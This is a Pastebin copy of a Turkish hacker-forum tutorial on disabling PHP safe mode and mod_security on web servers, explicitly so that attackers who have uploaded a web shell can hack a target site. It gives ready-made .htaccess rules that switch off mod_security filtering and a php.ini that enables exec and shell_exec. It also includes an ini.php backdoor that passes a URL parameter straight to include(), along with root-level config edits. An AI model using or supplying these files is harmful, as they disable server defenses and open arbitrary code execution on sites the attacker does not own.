Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım
- [img]http://i.hizliresim.com/ad95yO.gif[/img]
- Nette ilk ve Tek :) :D
- Server Safe Mode Off Hale Getirmek
- Sunucularda Güvenlik Modunu Devre Dışı Bırakma Detaylı Anlatım
- Selamün Aleyküm. Ben KingSkrupellos / Cyberizm.Org. Bugün size çok farklı yollardan Shellerdeki Güvenlik Modu nasıl kapatılır ve kırmızı'dan yeşil'e çevrilir onu anlatmak istiyorum.
- DİPNOT => Aşağıda vereceğim kodlar tamane %100 çalışmaktadır. O yüzden yapacağınız web sitesi saldırılarında indeks shell atmada kesinlikle CyBeRiZM.OrG sorumlu tutulamaz.
- Tamamen Eğitim Amaçlı yazdığım bir dökümandır. İyi ve Hayırlı Günlerde kullanın.
- Safe mode, sunucular için geliştirilmiş bir güvenlik önlemidir. Sunucularda otomatik yüklemeyi engellemek için kullanılır. Bu özellik ile sunuculara zararlı yazılımların yüklenmesi engellenmiş olmaktadır.
- Bunun yanında bu zamana kadarki bazı WebDomainHosting Sitelerindeki önemli bir Güvenlik Atlatma yollarınıda göstermek istiyorum Allahın izniyle.
- Hadi Başlıyalım =>
- Shell yüklediğniz sitelerde eğer Hedef Siteyi hacklemek arzundaysanız Güvenlik Modu On Değil. Kesinlikle Safe Mod Off Olması gerekir.
- Önemli Hatırlatma =>
- Sunucunuzun güvenlik modunu (safe mod) kapattığınız andan itibaren hackerların işini kolaylaştırmış olursunuz. Bu tarz durumlarda saldırı aldığınızda sunucunuzda bulunan dosya/klasörleri bir daha geri getiremeyecek şekilde kaybedebilirsiniz.
- [hide]Eğer bir sitede yazma izinlerinizin tamamı kapalı ise, aşağıdaki kodlardan ( .htaccess - ini.php - php.ini )'den yararlanarak Güvenlik Modunu pasif hale getiririz ve tüm izinler bize açılır.
- Bakın ya bunları FTP Adresinden ya FileZilla gibi FTP Programlarından en son ise elimizdeki Shell'den yükleyebiliriz.
- A) Maddesi
- 1-).htaccess dosyanızın içine aşağıdaki kodu ekleyin.
- [code]
- # BEGIN safe mode
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>
- # END safe mode[/code]
- 2-) ini.php dosyası oluşturup içine aşağıdaki kodu ekleyin ve htaccess in olduğu yere atın.
- [code]<?
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GETsansursansursansur91;"file"sansursansursansur93;);
- ini_restore("safe_mode");
- ini_restore("open_basedir");
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GETsansursansursansur91;"ss"sansursansursansur93;);
- ?>[/code]
- 3-) php.ini dosyası oluşturup içine aşağıdaki kodu ekleyin ve htaccess in olduğu yere atınız.
- [code]safe_mode = off
- exec = On
- shell_exec = On[/code]
- B) Maddesi =>
- FTP’den Dosyaları Safe Mode On/Off Yapmak
- 1- Bir adet .txt dosyasının içerisine şunu yazıp kaydediyoruz: safe_mode = off
- 2- Kayıt Ettiğimiz dosyayı FTP mize atıp adını , php.ini olarak değiştiriyoruz.
- 3- Bu dosyayı daha sonra FTP mizde bulunan ve safe mode kapatmak istediğimiz yazılıma ait tüm klasörlere atıyoruz.
- Bu şekilde siteniz için safe mode kapalı duruma gelmiş olacaktır.
- Eğer geri açmak İçinse Oluşturduğunuz .txt Dosyasına şunu yazacaksınız : safe_mode = on ve aynı işlemleri geri yüklüyeceksiniz.
- C) Maddesi =>
- Aşağıdaki kod ile sunucudaki tüm siteler için Safe Mode kapalı olması yerine biz sadece kendi sitemizin Safe Mode ayarını kapalı hale getiriyoruz. Bizim sorunumuz dış bir kaynaktan resim çekmek ve bu resmi yayınlayamamaktan yanaydı.
- Kodu sunucumuzda bulunan .htaccess dosyasına ekleyeceğiz. Bunun için bu dosyayı sunucumuzdan lokale çekip bir düzenleme programı ile açıp en alt satırına aşağıdaki kodu ekliyoruz.
- [code]php_value safe_mode "0"[/code]
- Eğer olmazsa bir de şu kod ile aynı işlemi deniyoruz:
- [code]php_flag safe_mode off[/code]
- Yine olmazsa sunucu üzerinde Apache ayarlarından Override durumlarını kontrol ettirip “All” yaptırmak gerekiyor.
- D) Maddesi
- Tüm Sunucudaki Sitelerin Ayarını Bozmak için yani Güvenlik Kapısını kapatmak için =>
- SSH'a girin.
- [code]nano /usr/local/lib/php.ini[/code]
- yazıp
- ctrl + f ile safe_mode aratın
- sonra on yazan yeri off yapın
- [code]service httpd restart yazın safe mode off[code] olacaktır..
- E) Maddesi
- ssh a girip ,
- [code]nano /usr/local/apahe/conf/httpd.conf [/code]
- yazınca
- ctrl + w ile o siteyi arat
- [code]DocumentRoot /home/cpuser/public_html/
- ServerName siteadi.com[/code]
- şeklinde birşey göreceksin, bu ikisinin arasına
- [code]php_admin_flag safe_mode off[/code]
- koyacaksın
- [code]DocumentRoot /home/cpuser/public_html/
- php_admin_flag safe_mode off
- ServerName siteadi.com[/code]
- F) Maddesi => Şimdi bu maddeyi ikiye ayırıcam =>
- 1) Olarak => Öncelikle ssh ile root girişi yapıyoruz,
- Daha sonra aşağıdaki komutla php.ini sayfasını açıyoruz.
- nano /etc/php.ini
- ctrl + w basıp safe_mode yazısını arıyoruz.
- safe_mode=On yazar bu değeri safe_mode=Off olarak değiştiriyoruz.
- başında ( ; ) olanda değil, başında ( ; ) olmayan satırda değişiklik yapıyoruz.
- daha sonra service httpd restart veya apachectl -k restart komutu ile restart atıyoruz.
- Tabiki aynı komutları kullanarak Plesk sunucular için Safe Modu on da yapabiliyoruz.
- 2. Maddesel Özellik => Siteye Özel Safe Mode Kapatma
- Bu yazımda size siteye özel nasıl safe mode kapatırız onu anlatacağım.
- Ssh'ı yada putty'yi çalıştırıp aşağıdaki komutu yazın:
- [code]pico /usr/local/apache/conf/httpd.conf[/code]
- Bu komutları girdikten sonra safemodu kapatacağınız siteyi aratın (ctrl+w yapıp siteniz.com'u):
- [code]<VirtualHost 75.134.45.78>
- ServerAlias siteniz.com
- ServerAdmin webmaster@siteniz.com
- DocumentRoot /home/siteniz/public_html
- BytesLog domlogs/siteniz.com-bytes_log
- <IfModule mod_userdir.c>
- UserDir disabled
- UserDir enabled siteniz
- </IfModule>
- User siteniz
- Group siteniz
- <IfModule mod_php4.c>
- php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
- </IfModule>
- <IfModule mod_php5.c>
- php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
- </IfModule>[/code]
- İşte burada sunucunuz hangi php sürümünü kullanıyorsa onun altına şu kodu ekliyoruz:
- [code]
- php_admin_flag safe_mode Off
- Eğer php5 kullanıyorsa (ki büyük ihtimal php5'dir) şu kodun altına yukarıdaki kodu ekliyorsunuz:
- Kod:
- <IfModule mod_php5.c>
- Sonuç:
- Kod:
- <VirtualHost 75.134.45.78>
- ServerAlias siteniz.com
- ServerAdmin webmaster@siteniz.com
- DocumentRoot /home/siteniz/public_html
- BytesLog domlogs/siteniz.com-bytes_log
- <IfModule mod_userdir.c>
- UserDir disabled
- UserDir enabled siteniz
- </IfModule>
- User siteniz
- Group siteniz
- <IfModule mod_php4.c>
- php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
- </IfModule>
- <IfModule mod_php5.c>
- php_admin_flag safe_mode Off
- php_admin_value open_basedir "/home/siteniz/:/usr/lib/php:/usr/local/lib/php:/tmp"
- </IfModule>[/code]
- Daha sonra değiliklikleri kaydediyoruz (ctrl+x) ve /etc/init.d/httpd restart yazıp ssh'den çıkıyoruz.
- ÖNEMLİ NOT: Şayet su php kullanıyorsanız kapatmak istediğiniz dizine chmod'u herhangi bir değerde olan bir php.ini dosyası oluşturmanız ve içerisine safe_mode = Off yazmanız yeterlidir.
- G) Php Safe Mode Açma ve Kapatma
- Aşağıdaki komutların tamamını root yetkisi ile SSH üzerinden gerçekleştirmelisiniz.
- Öncelikle php.ini dosyamızın yolunu öğreniyoruz;
- [code]php -i | grep php.ini[/code]
- Eğer sunucunuz cPanel ise aşağıdaki gibi çıkacaktır ;
- [code]/usr/local/lib/php.ini[/code]
- php.ini dosyamızı açıyoruz ;
- [code]nano /usr/local/lib/php.ini[/code]
- safe_mode açıyoruz ;
- [code]safe_mod = On;[/code]
- Eğer kapatmak isterseniz ;
- [code]safe_mod = Off;[/code]
- H) Maddesi =>
- 9) PHP Safe Mode Ayarlamak
- PHP Safe Mode deaktif etmek WHM/cPanel üzerinden PHP Configuration Editor(PHP Yapılandırma Düzenleyicisi) kısmından Safe Mode ayarlarını off yaparak kapatabilirsiniz. SSH üzerinden yapmak içinse ilk olarak php.ini dosyası hangi dizin yolunda onu bulmak gerek.
- Dosyamız hangi dizinde onu bulmak için;
- root[~]# php -i | grep php.ini
- Dosyada işlem yapmak için;
- root[~]# nano /usr/local/lib/php.ini (Düzenleme yapmak için)
- root[~]# pico /usr/local/lib/php.ini (Düzenleme yapmak için)
- root[~]# cat /usr/local/lib/php.ini (İçeriği görüntülemek için)
- safe_mode = Off yapıp kaydedebilirsiniz. Düzenleme işlemini WinSCP'den de yapabilirsiniz. Bu işlemi yaparsanız tüm sunucu için bu ayarlamanın geçerli olduğunu unutmayın. Sadece tek bir site üzerinde Safe Mode problemi alıyorsanız o sitenin Htaccess dosyasına Safe Mode deaktif kodunu ekleyerek çözüm sağlayabilirsiniz.
- İ) PHP 5.2.17 yeni Safe mode Bypass
- Farklı bir kodlama denedim. Bu da işe yaradı. İnşAllah işinize yarar.
- PHP.ini
- [code]short_open_tag = On
- log_errors = On
- log_errors_max_len = 1024
- ignore_repeated_errors = On
- register_globals = Off
- magic_quotes_runtime = Off
- magic_quotes_gpc = On
- allow_url_fopen = on
- AddHandler application/x-httpd-php4 .php
- display_errors = Off
- disable_functions = Bypass JoNaHHex
- safe_mode = Off[/code]
- ini.php
- [code]<?
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GET["file"]);
- ini_restore("safe_mode");
- ini_restore("open_basedir");
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GET["ss"]);
- ?>
- [/code]
- .htaccess
- [code]Options +FollowSymLinks
- DirectoryIndex ssssss.htm
- Options All Indexes
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- SecFilterCheckURLEncoding Off
- SecFilterCheckCookieFormat Off
- SecFilterCheckUnicodeEncoding Off
- SecFilterNormalizeCookies Off
- </IfModule>
- SetEnv PHPRC /home/user/public_html/php.ini
- suPHP_ConfigPath /home/user/public_html/php.ini[/code]
- J) Maddesi
- Plesk Sunucunuzda PHP Güvenli Modunun Kapatılması
- Parallels Plesk Paneli yükleme sırasında PHP'yi varsayılan olarak "güvenli moda" ayarlar. PHP'yi "güvenli moddan" çıkarmak için ayrılmış sunucunuza uzaktan bağlanmanız ve sunucunun PHP başlangıç dosyasını değiştirmeniz gerekir.
- Linux Sunucuları
- Linux Sunucunuzda PHP Güvenli Modunu Kapatmak için
- Sunucunuza SSH yoluyla bağlanın
- Kök kullanıcıya geçiş yap
- Sunucunuzun şifresini girin.
- Aşağıdaki komutu çalıştırın:
- vi /etc/php.ini
- safe_mode = on satırına gidin ve "i" tuşuna basın.
- Satırı safe_mode = off olarak değiştirin ve "Esc" tuşuna basın.
- Dosyanızı kaydetmek için :wq! yazın.
- Windows Sunucuları
- Windows Sunucunuzda PHP Güvenli Modunu Kapatmak için
- Sunucunuza, Uzak Masaüstü yoluyla bağlanın
- Notepad'de c:\windowsphp.ini dosyasını açın.
- safe_mode = on satırını safe_mode = off olarak değiştirin.
- php.ini dosyasını kaydedin ve kapayın.
- Dosyayı düzenledikten sonra Web sunucunuzu yeniden başlatmanız gerekir. Sunucu altında Hizmet Yönetimi bölümündeki durdur/başlat seçeneğini belirleyip Parallels Plesk Panel kullanarak Web sunucunuzu yeniden başlatabilirsiniz.[/hide]
- #### Şimdilik Anlatacaklarım bu kadar. Mr. KingSkrupellos. Cyberizm.Org Digital Security Technological Turkish Moslem Army ####
- Orjinal Konu Linki => https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement